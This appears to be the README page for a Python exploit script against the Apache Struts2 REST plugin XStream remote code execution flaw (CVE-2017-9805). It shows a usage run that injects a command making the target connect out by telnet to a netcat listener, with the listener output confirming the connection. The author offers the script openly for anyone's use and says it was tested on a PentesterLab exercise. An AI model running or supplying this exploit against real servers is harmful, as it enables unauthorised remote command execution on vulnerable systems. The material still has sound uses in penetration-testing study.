-CVE-2017-9805 copied to clipboard
Exploit script for Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)
Vulnerability information
Resources: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
What is this?
A python exploit script capable of executing remote commands into the shell of a system hosting a Struts2 vulnerable to S2-052.
╭─root@blackshell ~/
╰─# python s2-052.py --target '' --command "echo pwned | telnet 1234"
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [] from vulnerable.lan [] 55791
Tested on pentesterlab vulnerable machine of exercise s2-052.
Author rights
This exploit script was written by me (zc00l) and can be used by anyone.
In case you want to use or modify this script, please give the rightful credits for any work already done.